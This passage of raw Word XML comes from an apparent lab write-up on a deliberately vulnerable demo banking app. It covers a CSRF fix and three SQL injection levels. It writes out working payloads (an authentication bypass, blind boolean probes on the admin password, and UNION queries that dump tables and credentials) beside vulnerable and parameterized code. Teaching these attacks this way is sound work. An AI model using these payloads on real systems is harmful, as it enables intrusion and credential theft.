                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="777DD99C" w14:textId="3212393F" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.9 - Vulnerable mode: after visiting the malicious page, $500 has been transferred to NB-1000-ATTACKER with no consent; the balance is now $4730.75.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C67D6D5" w14:textId="2B25548E" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Fix (safe mode): every state-changing request must carry a per-session synchronizer token (_csrf) that the attacker's page cannot read. Requests without a valid token are rejected with HTTP 403, and the session cookie is additionally set SameSite=Strict as defence-in-depth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226CAFDB" w14:textId="11BE445E" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B518424" wp14:editId="43EAE831">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="2133916856"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3916856" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D786C12" w14:textId="5FD6B126" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.10 - Safe mode: the forged transfer is rejected with "403 - CSRF token missing or invalid".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038243EF" w14:textId="3774CEA3" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc242295525"/>
      <w:r>
        <w:t>2.6  SQL Injection - Easy (authentication bypass)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="7973ADCE" w14:textId="65DFB9D6" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Location: POST /login. In vulnerable mode the username and password are concatenated directly into the SQL query, so input can change the query's structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E3BF9" w14:textId="645A1EBF" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// [VULNERABLE]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>const sql = "SELECT * FROM users WHERE username = '" + username +</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            "' AND password = '" + password + "'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592321CA" w14:textId="33D42105" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Payload (username field):   ' OR '1'='1' --      (password: anything)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5643A1" w14:textId="516D5DC4" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>The trailing comment removes the password check, so the query returns the first user and logs the attacker in as alice with no valid credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0915AD" w14:textId="171B0767" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02F7BC49" wp14:editId="29768C23">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1317342534"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7342534" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA81A77" w14:textId="4F0C2065" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.11 - The injection payload entered in the username field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B914FF" w14:textId="2A21FA13" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74837BF9" wp14:editId="31B28A76">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1464248964"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4248964" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C80EEE8" w14:textId="1959FBD9" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.12 - Vulnerable mode: authentication is bypassed - signed in as alice with no valid password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6C37A3" w14:textId="119F5683" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Fix (safe mode): a parameterized query binds the input as data (never as SQL), plus a username format check. The payload can no longer alter the query structure and the login is refused:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672CAC04" w14:textId="1498F34D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// [SAFE]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>if (!/^[A-Za-z0-9_.\-]{1,32}$/.test(username)) return reject();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>db.prepare('SELECT * FROM users WHERE username = ? AND password = ?')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  .get(username, password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734980FC" w14:textId="4DE74CBD" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D77DF34" wp14:editId="6CCDE40C">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="25383499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3834994" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4E3F60" w14:textId="37E21FF1" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.13 - Safe mode: the injection is rejected with "Invalid username format." (HTTP 400).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25CC3B" w14:textId="5818C2C8" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc242295526"/>
      <w:r>
        <w:t>2.7  SQL Injection - Intermediate (blind, boolean-based)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="07927E25" w14:textId="19FE1195" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Location: GET /api/check-user?u=  (used by the "Forgot username?" page). The endpoint only returns true/false for whether a username exists, but that single bit is enough to extract data one character at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8CFE8" w14:textId="0B0CDE76" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Probe TRUE:   admin' AND substr(password,1,1)='S' --   -&gt; exists:true  (admin's password does start with S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F41C0" w14:textId="2C6A4D4D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Probe FALSE:  admin' AND substr(password,1,1)='A' --   -&gt; exists:false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF8D80D" w14:textId="6DEC2242" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16EB38F0" wp14:editId="528C560C">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="673172812"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3172812" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB264F9" w14:textId="7CD89FA3" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.14 - Vulnerable mode: the TRUE probe confirms the first character of admin's password is "S".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1827E3F8" w14:textId="2B40C7D7" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F3F4EEE" wp14:editId="3758539C">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1302344669"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2344669" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F723CAC" w14:textId="3C8E820E" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.15 - Vulnerable mode: the FALSE probe returns "No such username", so the character is not "A". Repeating this leaks the whole password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6451D555" w14:textId="32720C06" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Fix (safe mode): the query is parameterized, so the whole input is treated as a literal username. Only an exact username match can return true, and the injected condition is inert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C04FCB6" w14:textId="414E90EA" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E1A3DFE" wp14:editId="164A3177">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="173872942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38729427" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="365128AA" w14:textId="6291C9B0" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.16 - Safe mode: the same probe returns "No such username" - the boolean oracle is gone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E41122" w14:textId="4D722D20" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc242295527"/>
      <w:r>
        <w:t>2.8  SQL Injection - Advanced (UNION-based extraction)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3F2E2703" w14:textId="689B6545" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Location: GET /search?q=  The results query returns three columns (id, description, amount), which lets an attacker append a UNION SELECT to read arbitrary tables. SQLite's sqlite_master is the analogue of MySQL's information_schema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D856DF8" w14:textId="22D880C3" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Stage 1 - list the database tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A9B0A2" w14:textId="73EA3806" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x%' UNION SELECT 1, name, 3 FROM sqlite_master WHERE type='table' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36647D85" w14:textId="7BE61CAF" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E754D8" wp14:editId="165D59C9">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="336896595"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6896595" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A8915A" w14:textId="65DCE749" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.17 - Vulnerable mode: the UNION injection lists every table (users, accounts, transactions, messages, ...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D87A9" w14:textId="78CA38D4" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stage 2 - dump the credentials from the users table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B164F43" w14:textId="71EB7622" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x%' UNION SELECT id, username || ':' || password, 0 FROM users --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722A0877" w14:textId="2CD9D16F" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B44560F" wp14:editId="55F4408E">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1350352631"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0352631" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE0C4BD" w14:textId="0CE842E8" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.18 - Vulnerable mode: every username and password is extracted (alice:Password123!, bob:hunter2, admin:S3cr3t-Admin!). The injected query is shown in the server-side SQL panel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60616E8F" w14:textId="14DB5E03" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Fix (safe mode): a parameterized LIKE binds the search term as data, so the UNION payload is treated as a literal string to search for and simply returns no matches - no table or credential leakage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58920F76" w14:textId="0D97C749" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12C4E2DC" wp14:editId="351DDEAC">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1372147563"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2147563" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
